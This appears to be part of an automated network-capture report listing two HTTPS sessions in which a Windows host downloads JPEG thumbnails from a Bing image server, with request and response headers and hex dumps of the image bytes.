                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 14 69 fb 99 27 8f f7 91 f9 51 7f ac ff 00 6d ff 00 fa d4 56 76 3a 23 2b a3 ee 8f 0d f8 d6 df 5d b5 b9 d2 2f 7c 9b 8f b3 ef 83 52 d3 a4 fd f7 99 b7 ef b2 7f b3 e8 c2 b1 bc 67 73 27 86 bc 1b ab 78 a3 41 86 1d 67 4d d1 a3 9a ee e7 4a be b4 ff 00 89 8d bc 49 fe b2 dd 1b fb 9f c5 9f bd 5f 1e f8 ab e2 57 89 7c 09 a7 c9 a5 bd 9d a6 8b ae 69 da 97 d9 2f 6d bc a7 49 a4 8b 67 fa c5 46 fe 06 5a fa 1b c0 bf 1c bc 37 8d 27 5a d5 fc 79 69 71 e6 c8 9e 54 72 c2 90 fd ae 26 f9 1e 1d eb c6 e4 dd f3 79 95 f9 e4 b2 aa d4 92 f6 ab 9a 9b 7f 33 d4 75 a3 26 f9 74 91 dd 78 2b e2 c6 8b ae dd 46 fe 1b d5 f5 6b 8f b4 59 25 e4 76 d7 3b df cb fe 1f 29 7b b5 7c c3 fb 6a 68 fe 1e b4 f8 d9 fd bb 6b a7 4d a5 d8 f8 8b 4e 4b 8f 2e 38 bc 98 64 9d 77 c7 3f c8 df 75 b2 bc ad 69 7c 5e f8 51 e3
                                                                                                                                                                                                                                                                                                Data Ascii: i'QmVv:#+]/|Rgs'xAgMJI_W|i/mIgFZ7'ZyiqTr&y3u&tx+FkY%v;){|jhkMNK.8dw?ui|^Q


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                10192.168.2.649735150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC346OUTGET /th?id=OADD2.10239359955653_16Q8BS61PKT108CUW&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 498769
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: F0F55B6555034F02B1BB9461298B779C Ref B: EWR30EDGE1614 Ref C: 2024-12-20T06:31:12Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:12 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 33 37 3a 33 38 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 04 38 00 00 a0 03 00 03 00 00 00 01 07 80 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                                                                                                Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:37:388C
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 3a 2f fc 23 d6 b6 f1 e8 b1 ce f6 36 e9 f3 da 6f dc df 77 aa 6e ef f8 d7 c7 9e 13 69 2c f6 5e 79 1f 68 6f 3b 72 7f bc 1a be c5 d1 ee 7c 4b a9 78 72 1b 8f b3 d8 db b4 b0 ae c4 47 65 6e 7f de 1f 2d 3c 14 92 72 d3 51 62 23 aa 2f 68 77 2b 7f a5 25 e2 dc 46 cb 71 f3 26 cf e5 fe f0 ef 56 fc bd d1 fc d5 cb 7c 31 f0 f5 9f 86 74 79 ad d6 c2 4b 5d 4a 59 a4 96 ef 66 e9 55 d8 b1 23 db a5 74 1a 5e a8 d7 4e 90 c9 a6 df 5b cd f3 6f df 06 d5 e3 fd aa f4 a1 3b a5 7d ce 63 c2 7f 6c 8d 2f fb 27 5c d0 7c 55 a6 c9 f6 5b a6 76 89 dd 3e 56 f3 13 e7 47 fc 2b c6 a4 8f 5a bc d5 66 d5 af 35 6b a4 bc b8 4f b4 bd c3 c9 b5 a6 fa 9f e9 5f 46 7e da d7 30 59 fc 19 fb 54 d6 11 b5 c2 df 42 b6 93 3e dd d0 b1 6e a0 7f bb 5f 35 cd a9 cf 3e 8f fd a9 7d 7f 1b 6d 9b ca 78 53 fd 6a 7f b5 8a f0 f3
                                                                                                                                                                                                                                                                                                Data Ascii: :/#6owni,^yho;r|KxrGen-<rQb#/hw+%Fq&V|1tyK]JYfU#t^N[o;}cl/'\|U[v>VG+Zf5kO_F~0YTB>n_5>}mxSj
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 75 9b 44 fb 57 d9 65 8f fd 5c 49 68 9b 7e bb 54 f1 f8 d7 7c 52 c1 c2 13 c4 54 4d 5a d7 6a cd c8 99 49 4a fc ab 43 d2 ff 00 67 9f 0c 6a 7a f6 9b a8 2e 97 ae ea 3a 5d 8a ba ab bc 4e bf be f9 7f 8f 1f ca bd 77 58 4f 0b f8 5f c3 2e ba b5 86 9b e4 c4 8a be 4c 30 2e e9 9b f1 af 1e f8 03 e2 0d 4b c2 a9 71 a0 ac f1 d9 da cb 32 b4 29 71 02 f9 ae c7 fb a6 bb 0f 14 68 9f f0 95 ea 5f d9 fa b6 8b ac 5f dc 32 6e 49 9e 36 8a 2d be d2 74 c5 6f 1c ee 2e bc 70 78 7a 0e 75 2d ac ad ee 45 3e b7 eb e8 8e 3a 98 5d ea 4e 69 2e dd 59 c4 6b 91 78 f7 e3 0d bb db e9 fa 6c 96 fe 17 6b b5 58 7e d0 fb 60 45 1f 2e 40 fb d2 62 b9 df 8e 1f 03 b4 8b 2d 57 c2 de 05 f0 af da ee 35 cd 52 56 92 ee e3 e5 58 92 14 fb ef b4 7d da f7 8d 1f c4 11 e8 7a 6d 8d 9e a5 3d ae 9a b6 08 d6 df 61 4f f5 bc
                                                                                                                                                                                                                                                                                                Data Ascii: uDWe\Ih~T|RTMZjIJCgjz.:]NwXO_.L0.Kq2)qh__2nI6-to.pxzu-E>:]Ni.YkxlkX~`E.@b-W5RVX}zm=aO
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: ba 69 cd 3b fc be ed c5 52 8d a7 6b fe 67 73 e0 7f 07 78 56 ce eb fb 73 4b b4 f9 9b 72 a2 3f cc a9 f3 7f 06 6b 75 53 fe 2a 69 a4 fd da aa 5a 2a bf fd f5 5e 4f 63 aa f8 f6 df c3 f6 f6 ba 3e bb 25 fb 7f cb ba 26 81 22 ef 53 ff 00 4d 1b 8a cd d7 bc 4b f1 2e e3 c4 09 a6 e9 fa 4d f6 a5 34 49 1a eb 36 89 63 e5 6f 8f 6f 03 cd 3c 26 7d a9 d3 af 4d 24 94 6d 7e dd fe f2 67 4d c9 fc 5b 1e ad e0 1d 4b 47 f1 1d f6 a7 af 69 bf bd 91 6e 1a c7 ce ff 00 66 3f ee ff 00 b2 6b 4b fb 3b 4f 83 55 76 5b 08 fc e9 fe 69 a6 d9 f7 ff 00 de af 25 f0 2f c4 bb cf 0e 6a ba b4 3e 30 f0 9e a5 a5 c9 74 f1 b7 d9 ed 20 5f 22 16 0b b7 19 cf 75 db 5b de 2a f1 e7 89 b5 28 62 9b c0 7e 1e 79 66 8b fe 3e 1f 54 9e 35 89 14 fd d7 c2 b6 e6 fe 55 b4 6b 43 97 5d 59 9f 23 5d 0f 29 f8 d1 05 8c 1f 19 af
                                                                                                                                                                                                                                                                                                Data Ascii: i;RkgsxVsKr?kuS*iZ*^Oc>%&"SMK.M4I6coo<&}M$m~gM[KGinf?kK;OUv[i%/j>0t _"u[*(b~yf>T5UkC]Y#])
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 23 d9 6b 23 5e bd f0 fd ff 00 83 ef bc 31 27 85 ed 6d 7c 4f 61 a9 ac f6 37 b6 f1 ee df 6a fd 63 cf de fe f0 ae 83 f6 9a d4 7c 27 af f8 ab c3 7e 38 f0 ef 92 ba 87 9d b7 54 45 8d 97 7a 8f bb bb fd a1 58 da 5d ce 91 aa 7c 7a d2 6c e6 bf 82 c2 fa e1 e1 96 df 7a 6d 54 60 db 93 9e 8c b5 e4 56 a9 25 8b 74 e9 59 f3 7d d6 ff 00 33 ae 14 ef 45 39 2b 58 fa 16 6f 08 78 a3 49 d0 34 9d 5b c0 da cc 2d 77 65 69 1c 0f 6f 71 06 ef b4 c2 7b 37 fb 4b da bc fb c7 1a 66 a7 a6 fc 7a f0 b7 8f bc 55 a4 da b5 bd ba 35 9e a3 aa 5a 7e f6 07 62 b8 c3 a1 1f 26 0d 7d 15 25 ee 9b 6f 1f da 2e 2e 20 56 f9 77 ba 3d 79 7f c4 bb df 0e e8 be 3e d0 66 88 ea 5f 63 d4 2e e4 5d 46 d2 da 06 96 da e6 46 5d d1 97 43 fc 5e eb 5f 41 5a 8a 82 e6 4f 4d 3d 0f 3a 13 bb d5 15 7e 26 78 9f c3 af a5 ff 00 62
                                                                                                                                                                                                                                                                                                Data Ascii: #k#^1'm|Oa7jc|'~8TEzX]|zlzmT`V%tY}3E9+XoxI4[-weioq{7KfzU5Z~b&}%o.. Vw=y>f_c.]FF]C^_AZOM=:~&xb
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: de 1e d1 ee f5 0f 0d 5e ff 00 c2 59 a4 df b7 ef ac ae 2d 55 6e dd 7f bc 1c 70 f5 f3 ff 00 8a 3c 0d 3e 8d f6 8b 8d 2f c4 2f 6e b2 dc 6d b8 d3 ae d1 a2 96 d9 bf ba d5 f5 5f 82 3e 35 26 87 73 63 e1 7d 13 46 be f1 2e 99 15 be d5 8a df e6 be b6 db fc 3f dd 90 0f f8 0d 79 97 ed 3d e2 2d 37 c7 b7 5f 6e 4d 0e 4f 0d 6a d6 7e 64 77 29 71 1b 24 ee bf c1 e7 0c 0f c2 b8 b1 54 70 ae 9f 35 37 af 6d 7f 31 d3 75 39 f9 66 8f 34 f8 43 f1 53 c7 ff 00 0b b5 e8 63 58 37 d9 dc 3a ec b6 9b 6b 2b b7 fb 0d fc 39 af ae 3e 17 fc 63 d3 fc 67 71 a8 69 7a ad 8c da 5e af b2 36 b7 d9 07 ef 51 76 fd e3 ea 15 b9 f4 c5 7c 99 a7 fc 38 f1 55 ff 00 87 ed ee ae bc 3d e2 06 b3 5d b3 c3 7d 6f 6a d2 ae d1 fc 40 ff 00 76 b8 fd 7a 6d 73 43 92 2b cb 5b b9 22 6b 5b ef 2a 1b 88 5d b7 79 6f f7 79 ae 6c
                                                                                                                                                                                                                                                                                                Data Ascii: ^Y-Unp<>//nm_>5&sc}F.?y=-7_nMOj~dw)q$Tp57m1u9f4CScX7:k+9>cgqiz^6Qv|8U=]}oj@vzmsC+["k[*]yoyl
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: eb da 7f 84 61 d2 fe d5 6b ab 59 df 2c ac f6 ce be 57 98 8b 82 c8 b5 96 0e bc 29 42 a3 be e9 69 f3 36 c4 52 9d 57 1b 2d 11 db 7e d3 be 37 d0 4f 87 74 8b 1f b2 24 fa e2 db f9 e9 13 c2 bf e8 7b e3 db 9d df c2 de 95 e5 9f 0a 7c 6b ae f8 57 c2 ed ae 78 5b 49 9e e3 50 d7 26 6b 4b 8b 89 91 a5 5d c1 b8 93 db 15 6f e2 12 58 c1 a6 da 78 9a f3 cc 96 45 bb 87 ed d0 ef 5d d7 b1 ee dc 73 ee 6b dd fc 3b 37 8c f5 ef 07 7f c4 8f c2 16 3e 1a 59 37 7d 93 fb 47 ef 43 19 fb ac a8 9f 74 d6 be d2 78 ba ca a4 64 e3 6b 6c 9b 76 fd 3d 49 70 85 1a 7e cd ab df cf a9 f3 df c5 c3 7d a2 da 5c 5b ea 9a 95 8d d5 d5 c2 79 b7 6f 69 3f 9f 03 c8 ff 00 5f e2 fa 57 98 ea 57 16 31 6b 96 97 4b 6f 25 bd bd bc 2c d2 ef f9 95 e4 fe 1c 57 ad 7c 60 f8 5b e2 9d 24 34 fe 31 b8 b5 bd 86 e9 da 5f 3b 4e
                                                                                                                                                                                                                                                                                                Data Ascii: akY,W)Bi6RW-~7Ot${|kWx[IP&kK]oXxE]sk;7>Y7}GCtxdklv=Ip~}\[yoi?_WW1kKo%,W|`[$41_;N
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC16067INData Raw: 4a ad 5c 47 b9 2a 9b 6d a5 87 e8 71 cb 6f 6a da 7c d2 47 aa 6f 9b ca d3 b7 ff 00 1c 27 ee ef fa 74 ab 3a a6 a7 07 87 35 cf ec db 7b 08 16 4b 84 fd f5 c7 f7 3e 5f ba 2a 4f 18 41 a7 78 53 e1 ce b1 aa 35 8c 76 ea b6 fe 7f df 66 f3 a4 fe 15 5a e4 f4 fb dd 67 56 f0 fc 3a e5 9d dc 6d 63 79 6e b2 6f bb 83 cd 5d df d0 57 a5 43 88 b0 f5 70 f1 ab 6d 1e 8d f6 7d be 7e a5 ce 32 8e 89 5e e5 af 11 68 7e 29 bc f0 cd bf 8a b4 3b b9 ed f4 d9 6e 3c b9 ae 12 76 5d 92 2f 4e 41 cd 69 78 0f e3 7f 89 b4 3d 06 3d 32 da 7b 59 e4 bc dd 0c bb fe f6 ef bb e6 2f bd 5a d6 35 eb 6f f8 45 6d f4 1d 4b 52 8e df ed fb 7f d1 ed dd 55 52 4f ef 2a 57 97 69 3a 04 09 af f9 90 c7 f6 c6 b5 bb 91 53 7b ed 91 19 5b ef 1e d5 c7 84 cc 5c 65 ed 68 ce 71 4b af ad ef ae d6 d8 e7 ad 45 d4 f7 a4 8f 6b f8
                                                                                                                                                                                                                                                                                                Data Ascii: J\G*mqoj|Go't:5{K>_*OAxS5vfZgV:mcyno]WCpm}~2^h~);n<v]/NAix==2{Y/Z5oEmKRURO*Wi:S{[\ehqKEk
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC16384INData Raw: d6 de 57 f7 d8 56 67 c5 2d 52 da e1 34 fd 0f 4f 47 ba 8e df 50 5f dc ef da b7 33 05 cf cc 7f ba 95 c0 7c 5a f1 35 f7 86 74 9b 7b 1d 3f 5d 7b 7d 7b 52 b8 fd ec 4f f3 2d b4 67 8f 9f fb ac 7f 95 62 7c 21 d6 ac a1 d7 21 99 6f 9e f6 fa c1 da 0b eb 8b bd de 54 2c ff 00 5e de f5 df 82 ca 2b 4f fd b6 55 2d 15 a2 5a db 4d 2f e9 7f bc d9 6d c9 63 dd 3c 23 73 37 85 7c 45 a3 e9 77 50 47 71 7d e2 a9 be 4f 2b ef 5c c8 fd 53 d9 51 79 15 83 fb 45 69 d6 d6 7f 11 ad fc 33 6b 3e 9d 79 71 aa 4d f3 dd ef db 14 2a 9f 36 dd a3 3d 2b ce 3e 27 78 d3 4d f1 07 c4 2d 06 38 ef ff 00 b2 61 b2 76 54 74 dc df 66 f9 7e ff 00 af 3e dd 05 61 6a da cd ce 97 e3 8d 2e e2 e2 48 25 68 a6 65 b7 bb 5f de c5 36 7f 89 b7 75 35 ed 51 c1 38 d0 8d 3a 8b 9a 6f de bd fd 6c 92 fb 9e e2 54 53 bc 9c ac b6
                                                                                                                                                                                                                                                                                                Data Ascii: WVg-R4OGP_3|Z5t{?]{}{RO-gb|!!oT,^+OU-ZM/mc<#s7|EwPGq}O+\SQyEi3k>yqM*6=+>'xM-8avTtf~>aj.H%he_6u5Q8:olTS
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:13 UTC16384INData Raw: 07 96 ce bf ed 56 18 89 d5 4e 9e 13 97 d5 df f2 f5 25 c9 73 3a 8b 63 9d f1 05 86 8d 75 3c 53 47 04 8c d2 ee f2 91 13 e5 4f 9a ab cd a3 cf 17 89 fc c9 a4 ff 00 45 95 17 ed 1b 13 f8 47 52 bf 4a d1 f0 8e a1 14 5a b4 4d 75 1c 72 d9 dd 6e 64 df ec b5 7b 43 d6 60 8e 77 b7 b8 79 25 9a 2f 9b e7 f9 b7 a9 e8 d5 b4 65 52 9b 4b 75 6e a5 af 7d 21 f3 4a ba a4 fa b2 e8 bb 16 18 13 f7 56 ff 00 c4 f0 8e 37 fe 3d 6b 4f c3 7e 11 d7 6e 34 0b bb 89 ad 27 8a d6 58 95 93 66 df 2b fd e3 5c ee bd 6d 63 14 8f f6 59 3c 8b 85 7d d1 3f f1 6d fe ef fb b5 d2 6a 9f 19 35 a9 3c 1d 16 87 6b a6 d8 fd a9 51 7e d7 73 0f cd fb b4 fb a3 1f ce bc dc 4f d7 25 08 47 09 14 d3 7a df a2 ee 6a 9b 8a f7 8d 2f 87 51 5f 68 7a 5d a5 9c 73 da b5 f3 6a ca df be 83 cd 8b 68 5e df ec d7 56 f6 5e 3a f3 35 6d
                                                                                                                                                                                                                                                                                                Data Ascii: VN%s:cu<SGOEGRJZMurnd{C`wy%/eRKun}!JV7=kO~n4'Xf+\mcY<}?mj5<kQ~sO%Gzj/Q_hz]sjh^V^:5m


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                11192.168.2.649736150.171.27.10443
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC375OUTGET /th?id=OADD2.10239359955652_1UH15L5Z2LXM3P8PA&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                                                                                                                                Host: tse1.mm.bing.net
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=2592000
                                                                                                                                                                                                                                                                                                Content-Length: 591970
                                                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                                                                Timing-Allow-Origin: *
                                                                                                                                                                                                                                                                                                Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                                                                                                                                                                                                                                                                                                NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                X-MSEdge-Ref: Ref A: 7D549C6CE6284FF1A02FA3338EA5E34F Ref B: EWR30EDGE0921 Ref C: 2024-12-20T06:31:12Z
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:11 GMT
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 18 6c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 33 20 31 38 3a 33 37 3a 31 31 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01
                                                                                                                                                                                                                                                                                                Data Ascii: JFIF``lExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:13 18:37:118
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 51 4d 67 6d 70 ff 00 e9 96 db 52 3f f5 6d bb 1b fd 33 5e ac 60 31 5c 69 f6 1a 66 b3 f6 55 8b 73 3d bf 91 e6 79 ca 17 18 19 fb b8 35 f1 e4 7f 1e 25 f1 5a f8 6c df c2 be 16 d6 3c 2b 79 12 dc 1d 8b 24 0f bf e4 92 4d 87 9c 77 28 7f 03 5f 4f d8 eb b7 3e 20 bc d1 e3 fe ca 37 b6 91 ee 97 fb 7a 2d d1 5a 3b 6d 2a 36 a6 77 7c df f7 cf bd 7a f8 1c 65 09 b9 a8 6f a6 9f 24 bf ae 87 35 58 ca c9 f4 ff 00 82 74 1a ca 34 1a 7c 5a cb dd a4 57 16 cd f3 cb 6f 1b 32 cc a7 e5 da c9 fc 5f d2 b9 5f 8a 50 5d eb 1e 17 93 55 b9 b0 99 de ce e1 61 b5 d3 1e 1d cf 36 e9 10 37 cc bc e5 ba 7c bd 05 74 3e 2c b7 d4 e5 d1 15 05 f4 16 16 50 b2 49 2c b6 90 ee 64 8d 3e 66 f9 5b f8 7f dd ed 59 7f 13 e4 4d 5b c4 9e 14 d0 9b 51 fb 3e 9d aa 5d f9 b3 6c 91 57 cf f2 57 cd 58 f3 90 ff 00 37 fb 35 e8
                                                                                                                                                                                                                                                                                                Data Ascii: QMgmpR?m3^`1\ifUs=y5%Zl<+y$Mw(_O> 7z-Z;m*6w|zeo$5Xt4|ZWo2__P]Ua67|t>,PI,d>f[YM[Q>]lWWX75
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 1a 66 a5 a8 dc 69 71 4d e6 c3 69 34 fe 6c 0f 1a af ce 8c bf c2 d8 3c 57 b8 7e d3 da 64 ba 8f 8f 3c 13 79 a0 e9 fa 75 b4 3a 86 a3 1d a4 37 51 40 aa ad 20 90 3e 1f 8d 8e 57 66 ce 98 f5 ae eb 53 d3 bc 05 f1 5b 4d d6 fc 2f af e9 b0 da ea da 4b 4f 15 a6 a0 9a 73 40 ce a8 a3 73 a8 1f 7b 6b 7c af 1f f4 35 c0 f0 52 9d 59 3a 6d 45 a7 a6 eb ee 65 fb 58 fb 35 cc ae 73 7e 1f fd a5 74 7b ff 00 0b c5 6d a2 78 79 d7 54 b8 f9 53 4b b9 ba 55 df bf fb bb bd 47 f7 4e 3d ab a3 d7 fc 4b a4 78 df 5c b1 89 fc 37 7d e4 f8 42 d3 fb 4d 52 6b a4 85 ad ae 36 85 8d f9 3f bc da bb ff 00 1a f9 17 e3 07 c3 cd 6b e1 c7 8c 2e 2c 35 0b e8 44 d6 0f 1f 95 2a c1 26 d7 84 af ee e4 8a 4e 9f 55 3c 83 52 7c 35 f8 f5 a6 6a 9e 3c d3 6d 7e 2a e9 a8 eb 04 4d a5 25 f2 7f a3 23 ae ef 93 ed 05 54 ef c3
                                                                                                                                                                                                                                                                                                Data Ascii: fiqMi4l<W~d<yu:7Q@ >WfS[M/KOs@s{k|5RY:mEeX5s~t{mxyTSKUGN=Kx\7}BMRk6?k.,5D*&NU<R|5j<m~*M%#T
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: da a6 e9 fc 9f e2 9b 0b b7 0b 8f bb 9a e1 24 9d af 3c 3e 9a c4 da 4d d5 ac cb 32 c6 fb f7 34 1b 57 b9 66 e7 75 75 fa 4e a3 24 17 5a 84 70 c1 03 49 14 cb 73 a7 24 db 9b fe 5a 63 62 c6 dc ff 00 7b 35 7b cb 8b fb 62 66 d3 7c bb d9 a2 7b 49 13 f8 55 24 dd bf 88 9b 28 cb bb ad 79 f5 2a 37 25 ae 8f fa 67 4f 2f bb 7e a7 49 f0 7f 42 d5 7c 61 e0 eb 4b ab 1f 1b df 58 69 6b 71 f6 19 b7 be e8 3e d0 7e ed bc 96 f9 2c ea 55 9f 04 0e b5 ea 9e 07 f8 6f a9 58 f8 c2 d2 1d 23 c7 52 7d b1 ac 83 5b b5 f7 99 e7 fd 96 1f dd 32 3a f1 fb a6 e8 bd 18 0a d2 b3 b8 b9 fe d2 87 c5 96 7e 04 4b cd 3f c5 16 31 b5 dd f4 33 c3 14 b6 d7 10 7e f3 6f 96 ea bf dc 6d bd fd 0f 35 db ea de 20 b4 bc fe cf f1 65 b5 ad ae 9d 1c 17 11 7f a6 6b 36 2f 04 ad 6f 23 7e f1 90 b0 f9 43 fc 83 e9 cd 7d 25 3c
                                                                                                                                                                                                                                                                                                Data Ascii: $<>M24WfuuN$ZpIs$Zcb{5{bf|{IU$(y*7%gO/~IB|aKXikq>~,UoX#R}[2:~K?13~om5 ek6/o#~C}%<
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:12 UTC16384INData Raw: 76 6d a7 47 71 6b 6b 3d af d9 65 d4 63 96 19 bc f5 97 fd 1c e0 b8 3f dc 6d dd bd 6b 37 c1 bf 0e e0 b7 d0 53 5c f1 27 8a 2d 75 2d 6a 29 96 54 8a de 06 69 7c c3 95 73 e6 f4 da 3d 2b 8e d7 ee 7c 43 e0 4d 4a d3 c3 f6 bb f5 6d 3f 4b b4 fb 4d da 3f cb 14 cb bb cd 7d ac bc e4 7c a3 03 e9 4b 1d 98 55 c5 4d 42 ab 4e c9 35 b2 f5 b7 dd b3 23 0f 4e 8d 3b fb 3d fa 9b be 19 d2 af ac af ad e6 bc d3 63 b8 b8 d5 2e 2e 6c ee 21 df f3 43 f7 db ef 75 fb be 86 b4 b4 ff 00 0b b3 f8 71 35 88 75 28 ef 37 5f 47 05 c7 d9 a4 f9 61 63 c2 1d df dd f5 a8 fe 1b dc d8 fc 4c f0 ad f7 88 2d 6c 6e a0 6b 7b 89 ae 52 1b ef 95 a1 fd d8 fe 1f f7 ba 11 5d 0f 85 fc 43 07 c3 8f 0c ae 9b e3 3f 0b ea 2d a3 eb 32 c6 a9 77 63 f3 7e f0 b7 de 95 7f 83 0d d0 fa d7 93 57 30 a9 09 3a 71 5f bd 8b d6 3a 6a
                                                                                                                                                                                                                                                                                                Data Ascii: vmGqkk=ec?mk7S\'-u-j)Ti|s=+|CMJm?KM?}|KUMBN5#N;=c..l!Cuq5u(7_GacL-lnk{R]C?-2wc~W0:q_:j
